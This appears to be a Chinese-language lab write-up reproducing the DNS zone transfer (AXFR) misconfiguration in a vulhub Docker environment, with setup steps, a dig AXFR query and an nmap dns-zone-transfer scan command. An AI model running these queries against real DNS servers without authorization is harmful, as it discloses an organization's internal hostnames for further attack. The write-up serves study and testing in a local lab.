漏洞简介
DNS支持使用axfr类型的记录进行区域传输,可以解决主从同步的问题。如果管理员在配置DNS服务器的时候没有限制获取记录的来源,会导致DNS域传输漏洞。 在DNS查询中,axfr类型是Authoritative Transfer的缩写,指请求传送某个区域的全部记录。
环境搭建
docker运行vulhub漏洞环境 cd /vulhub/dns docker-compose up -d 环境运行后,会监听TCP和UDP的53端口,DNS协议同时支持从这两个端口进行数据传输。
漏洞复现
在linux上,我们可以使用dig命令来发送DNS请求,比如,我们使用命令dig @your-ip www.vulhub.org获取域名www.vulhub.org在DNS服务器上的记录  发送axfr类型DNS请求:dig @your-ip -t axfr vulhub.org  可见,获取到了vulhub.org的所有子域名记录,这里存在DNS域发送漏洞。 我们也可以使用nmap脚本来扫描漏洞 nmap --script dns-zone-transfer.nse --script-args “dns-zone-transfer.domain=vulhub.org” -Pn -p 53 your-ip 我这里什么也没有扫到,不知道是为什么 人家结果应该是下面这样子这样的(快哭了) 
销毁环境
docker-compose down
|